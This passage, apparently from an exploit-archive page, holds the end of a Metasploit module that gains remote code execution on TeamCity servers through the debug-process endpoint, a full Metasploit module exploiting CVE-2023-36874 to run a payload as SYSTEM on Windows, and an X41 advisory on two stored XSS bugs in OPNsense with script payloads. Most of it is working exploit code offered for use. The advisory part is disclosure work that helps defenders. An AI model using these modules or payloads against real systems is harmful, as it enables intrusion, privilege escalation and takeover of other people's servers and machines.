deleting and generating a new one.') unless delete_token(token_uri) fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.') end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(token_uri) ) end unless res&.code == 200 # One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here # and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option. if res && (res.code == 404) && res.body.include?('User not found') print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.') end fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.') end begin token = Nokogiri::XML(res.body).xpath('/token')&.attr('value').to_s print_status("Created authentication token: #{token}") print_status('Modifying internal.properties to allow process creation...') unless modify_internal_properties(token, 'rest.debug.processes.enable', 'true') fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.') end begin print_status('Executing payload...') vars_get = {} # We need to supply multiple params with the same name, so the TeamCity server (A Java Spring framework) can # construct a List<String> sequence for multiple parameters. We can do this be enabling `compare_by_identity` # in the Ruby Hash. vars_get.compare_by_identity case target['Platform'] when 'win' vars_get['exePath'] = 'cmd.exe' vars_get['params'] = '/c' vars_get['params'] = payload.encoded when 'linux' vars_get['exePath'] = '/bin/sh' vars_get['params'] = '-c' vars_get['params'] = payload.encoded end res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('/app/rest/debug/processes'), 'uri_encode_mode' => 'hex-all', # we must encode all characters in the query param for the payload to work. 'headers' => { 'Authorization' => "Bearer #{token}", 'Content-Type' => 'text/plain' }, 'vars_get' => vars_get ) unless res&.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to execute arbitrary process.') end ensure print_status('Resetting the internal.properties settings...') unless modify_internal_properties(token, 'rest.debug.processes.enable', nil) fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.') end end ensure print_status('Deleting the authentication token.') unless delete_token(token_uri) fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.') end end end def delete_token(token_uri) res = send_request_cgi( 'method' => 'DELETE', 'uri' => normalize_uri(token_uri), 'headers' => { 'Connection' => 'close' } ) res&.code == 204 end def modify_internal_properties(token, key, value) res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('/admin/dataDir.html'), 'headers' => { 'Authorization' => "Bearer #{token}" }, 'vars_get' => { 'action' => 'edit', 'fileName' => 'config/internal.properties', 'content' => value ? "#{key}=#{value}" : '' } ) unless res&.code == 200 # If we are using an authentication for a non admin user, we cannot modify the internal.properties file. The # server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again. if res&.code == 302 print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.') end return false end print_status('Waiting for configuration change to be applied...') retry_until_truthy(timeout: datastore['TEAMCITY_CHANGE_TIMEOUT']) do res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri('/admin/admin.html'), 'headers' => { 'Authorization' => "Bearer #{token}", 'Accept' => '*/*' }, 'vars_get' => { 'item' => 'diagnostics', 'tab' => 'properties' } ) res&.code == 200 && res.body.include?(key) end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common include Msf::Post::File include Msf::Exploit::FileDropper include Msf::Post::Windows::Priv include Msf::Exploit::EXE prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability', 'Description' => %q{ This module takes advantage of a bug in the way Windows error reporting opens the report parser. If you open a report, Windows uses a relative path to locate the rendering program. By creating a specific alternate directory structure, we can coerce Windows into opening an arbitrary executable as SYSTEM. If the current user is a local admin, the system will attempt impersonation and the exploit will fail. }, 'License' => MSF_LICENSE, 'Author' => [ 'Filip Dragović (Wh04m1001)', # PoC 'Octoberfest7', # PoC 'bwatters-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-07-11', 'References' => [ ['CVE', '2023-36874'], ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'], ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'], ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF'] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ ARTIFACTS_ON_DISK ] }, 'Compat' => { 'Meterpreter' => { 'Commands' => %w[ stdapi_fs_delete_file stdapi_sys_config_getenv ] } } ) ) register_options([ OptString.new('EXPLOIT_NAME', [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]), OptString.new('REPORT_DIR', [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]), OptString.new('SHADOW_DRIVE', [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]), OptInt.new('EXECUTE_DELAY', [true, 'The number of seconds to delay between file upload and exploit launch', 3]) ]) end # When we pass the directory value to the mkdir method, the mkdir method # passes the reference to the string containing the directory. # We do a lot of string manipulation in this module, so this is a quick # hack to make sure that despite what we do with the string after we create # the directory, it is the actual directory we created that gets sent to # the cleanup methods. def clone_mkdir(dir) mkdir(dir.clone) end def upload_error_report wer_archive_dir = get_env('PROGRAMDATA') vprint_status(wer_archive_dir) wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive' report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}" report_filename = "#{report_dir}\\Report.wer" vprint_status("Creating #{report_dir}") clone_mkdir(report_dir) wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer') vprint_status("Writing Report to #{report_filename}") write_file(report_filename, wer_report_data) end def build_shadow_archive_dir(shadow_base_dir) wer_archive_dir = shadow_base_dir clone_mkdir(wer_archive_dir) wer_archive_dir << '\\ProgramData\\' clone_mkdir(wer_archive_dir) wer_archive_dir << 'Microsoft\\' clone_mkdir(wer_archive_dir) wer_archive_dir << 'Windows\\' clone_mkdir(wer_archive_dir) wer_archive_dir << 'WER\\' clone_mkdir(wer_archive_dir) wer_archive_dir << 'ReportArchive\\' clone_mkdir(wer_archive_dir) report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}" clone_mkdir(report_dir) return report_dir end def upload_shadow_report(shadow_archive_dir) report_filename = "#{shadow_archive_dir}\\Report.wer" wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer') vprint_status("Writing bad Report to #{report_filename}") write_file(report_filename, wer_report_data) end def build_shadow_system32(shadow_base_dir) shadow_win32 = "#{shadow_base_dir}\\system32" vprint_status("Creating #{shadow_win32}") clone_mkdir(shadow_win32) return shadow_win32 end def upload_payload(shadow_win32) payload_bin = generate_payload_exe payload_filename = "#{shadow_win32}\\wermgr.exe" vprint_status("Writing payload to #{payload_filename}") write_file(payload_filename, payload_bin) end def upload_execute_exploit(exploit_path, shadow_path, home_dir) vprint_status("shadow_path = #{shadow_path}") exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe') write_file(exploit_path, exploit_bin) sleep datastore['EXECUTE_DELAY'] vprint_status("Exploit uploaded to #{exploit_path}") cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}" output = cmd_exec(cmd, nil, 30) vprint_status(output) end def check # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers. version = get_version_info vprint_status("OS version: #{version}") return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2 return Exploit::CheckCode::Safe end def exploit fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group? fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system? shadow_dir = datastore['SHADOW_DRIVE'] home_dir = get_env('HOMEDRIVE') shadow_path = "#{home_dir}\\#{shadow_dir}" vprint_status("Shadow Path = #{shadow_path}") upload_error_report shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup) upload_shadow_report(shadow_archive_dir) shadow_system32 = build_shadow_system32(shadow_path.dup) upload_payload(shadow_system32) sleep datastore['EXECUTE_DELAY'] exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}" exploit_path << '.exe' unless exploit_path[-4..] == '.exe' if shadow_dir.length > 64 fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long') end upload_execute_exploit(exploit_path, shadow_dir, home_dir) print_warning("Manual deletion of #{shadow_path} may be required") end end </code></pre>

<pre><code> Advisory X41-2023-001: Two Vulnerabilities in OPNsense =========================================================== Highest Severity Rating: High Confirmed Affected Versions: 23.1.11_1, 23.7.3, 23.7.4 Confirmed Patched Versions: Commit 484753b2abe3fd0fcdb73d8bf00c3fc3709eb8b7 Vendor: Deciso B.V. / OPNsense Vendor URL: https://opnsense.org Credit: X41 D-Sec GmbH, Yasar Klawohn and JM Status: Public Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2023-001-opnsense Summary and Impact ------------------ The OPNsense dashboard displays widgets with information about the system, running services, gateways and more. These widgets can be arranged in different orders and columns. The values for the number of columns and the order of widgets are stored server-side and are the same for all users of an OPNsense instance. They are reflected unmodified on every visit. This can be abused by a low-privileged attacker to inject their own content into the page, enabling a cross-site scripting (XSS) attack that can result in privilege escalation. Product Description ------------------- OPNsense is an open source, FreeBSD-based firewall and routing operating system. It includes many features of commercial firewalls and can be managed entirely via its web GUI. Stored XSS in the OPNsense Dashboard via the column_count Parameter =================================================================== Severity Rating: High Vector: Network CWE: 79 CVSS Score: 8.0 CVSS Vector: 3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H Credit: X41 D-Sec GmbH, Yasar Klawohn Analysis -------- The number of columns displayed in the dashboard is set via an HTTP POST request to /index.php, using the column_count request parameter. This parameter is not properly escaped when returned to the client. To exploit this issue, the payload "><script>alert(1)</script> is submitted as part of the column_count parameter. This input is reflected unmodified in the response and on any subsequent visit to the dashboard by any user. Only the "Lobby: Login / Logout / Dashboard" permission is required to abuse this issue. Once the server receives the POST request, the column_count parameter is written unmodified into the configuration: } elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['origin']) && $_POST['origin'] == 'dashboard') { // ... if (!empty($_POST['column_count'])) { $config['widgets']['column_count'] = $_POST['column_count']; } elseif(isset($config['widgets']['column_count'])) { unset($config['widgets']['column_count']); } write_config('Widget configuration has been changed'); header(url_safe('Location: /index.php')); exit; } // from: // https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L66-L79 If the column_count parameter is not empty, it is used unmodified: // ... if ($_SERVER['REQUEST_METHOD'] === 'GET') { $pconfig = $config['widgets']; // ... $pconfig['column_count'] = !empty($pconfig['column_count']) ? $pconfig['column_count'] : 2; // ... // from: // https://github.com/opnsense/core/blob/306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L42 Below, the unmodified value is written:  <section class="page-content-main"> <form method="post" id="iform"> <input type="hidden" value="dashboard" name="origin" id="origin" /> <input type="hidden" value="" name="sequence" id="sequence" /> <input type="hidden" value="<?= $pconfig['column_count'];?>" name="column_count" id="column_count_input" /> </form>   Proof of Concept ---------------- Log in as root. On the left side, go to System -> Access -> Users, and add a new user. For "Effective Privileges", only select "Lobby: Login / Logout / Dashboard". The user is now only able to view the dashboard and the help pages. Log in as that newly created user and open your browser's network monitor. In the OPNsense dashboard, select "1 column" from the top right and then press "save settings". Repeat the POST request and replace the column_count variable with column_count=1"><script>alert(1)</script> Now, log in as admin again, you should see an alert box resulting from the following HTML response: <form method="post" id="iform">  <input type="hidden" value="1"> <script>alert(1)</script>" name="column_count" id="column_count_input" /> </form> This is the stored XSS and can result in privilege escalation. The OPNsense developers did apply a Content-Security-Policy, but unfortunately allow unsafe-inline and unsafe-eval for scripts, which does not prevent the exploitation of this vulnerability. Stored XSS in the OPNsense Dashboard via the sequence Parameter =============================================================== Severity Rating: High Vector: Network CWE: 79 CVSS Score: 8.0 CVSS Vector: 3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H Credit: X41 D-Sec GmbH, JM and Yasar Klawohn Analysis -------- The order in which the widgets are displayed in the Dashboard is set via an HTTP POST request to /index.php, using the sequence request parameter. This parameter is not properly escaped when returned to the client. To exploit this issue, the payload "><script>alert(1)</script> is submitted as part of the sequence parameter. This input is reflected unmodified in the response and on any subsequent visit to the dashboard by any user. Only the "Lobby: Login / Logout / Dashboard" permission is required to abuse this issue. The order in which widgets are displayed on the dashboard can be set in the same POST request, via the sequence parameter. The sequence parameter has the following format: sequence=services_status-container:00000000-col3:show, interface_list-container:00000001-col4:show, gateways-container:00000002-col4:show Once the server receives the POST request, the sequence parameter is written unmodified into the configuration: } elseif ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['origin']) && $_POST['origin'] == 'dashboard') { if (!empty($_POST['sequence'])) { $config['widgets']['sequence'] = $_POST['sequence']; } elseif (isset($config['widgets']['sequence'])) { unset($config['widgets']['sequence']); } // ... write_config('Widget configuration has been changed'); header(url_safe('Location: /index.php')); exit; } // from: // https://github.com/opnsense/core/blob/cbaf7cee1f0a6fabd1ec4c752a5d169c402976dc/src/www/index.php#L66-L80 When serving a GET request, the sequence parameter is returned unmodified, starting with a read of its value from the configuration: // ... $pconfig = $config['widgets']; // set default dashboard view $pconfig['sequence'] = !empty($pconfig['sequence']) ? $pconfig['sequence'] : ''; // ... // from: // https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L39-L41 sequence is then split by comma and further split by colon into name, sortKey, and state. The list of widgets is sorted on the server side using the sortKey. $widgetSeqParts = explode(",", $pconfig['sequence']); foreach (glob('/usr/local/www/widgets/widgets/*.widget.php') as $php_file) { $widgetItem = array(); // [...] foreach ($widgetSeqParts as $seqPart) { $tmp = explode(':', $seqPart); if (count($tmp) == 3 && explode('-', $tmp[0])[0] == $widgetItem['name'] ) { $widgetItem['state'] = $tmp[2]; $widgetItem['sortKey'] = $tmp[1]; } } $widgetCollection[] = $widgetItem; } // sort widgets usort($widgetCollection, function ($item1, $item2) { return strcmp(strtolower($item1['sortKey']), strtolower($item2['sortKey'])); }); // from: // https://github.com/opnsense/core/blob/2306449329e462364c07317b23a1f257779a4fc8/src/www/index.php#L44-L65 Finally, the sortKey is written unescaped into an HTML attribute: <section class="widgetdiv" data-sortkey="<?=$widgetItem['sortKey'] ?>" id="<?=$widgetItem['name'];?>" style="display:<?=$divdisplay;?>;"  Proof of Concept ---------------- Log in as root. On the left side, go to System -> Access -> Users, and add a new user. For "Effective Privileges", only select "Lobby: Login / Logout / Dashboard". The user is now only able to view the dashboard and the help pages. Log in as that newly created user and open your browser's network monitor. In the OPNsense dashboard, reorder the widgets via drag-and-drop, then press "save settings". Repeat the POST request and replace the sequence variable with sequence=gateways-container:1"><script>alert(1)</script>-col4:show Now, log in as admin again, you should see an alert box resulting from the following HTML response: <div class="container-fluid">  <section class="widgetdiv" data-sortkey="1"> <script>alert(2)</script> -col4" id="gateways" style="display:block;"> This is the stored XSS and can result in privilege escalation. The OPNsense developers did apply a Content-Security-Policy, but unfortunately allow unsafe-inline and unsafe-eval for scripts, which does not prevent the exploitation of this vulnerability. Workarounds =========== Remove all effective privileges for /index.php* of low-privilege users. Timeline ======== 2023-09-13: Problem discovered 2023-09-14: Write-up and discovery of second finding 2023-09-19: Disclosure to Deciso B.V. / OPNsense 2023-09-19: Issue fixed upstream by Deciso B.V. / OPNsense 2023-09-20: CVE requested 2023-09-20: Informed Deciso B.V. / OPNsense that we will make the issues public the following day, since the patch is public 2023-09-21: Release of advisory About X41 D-Sec GmbH ==================== X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41. </code></pre>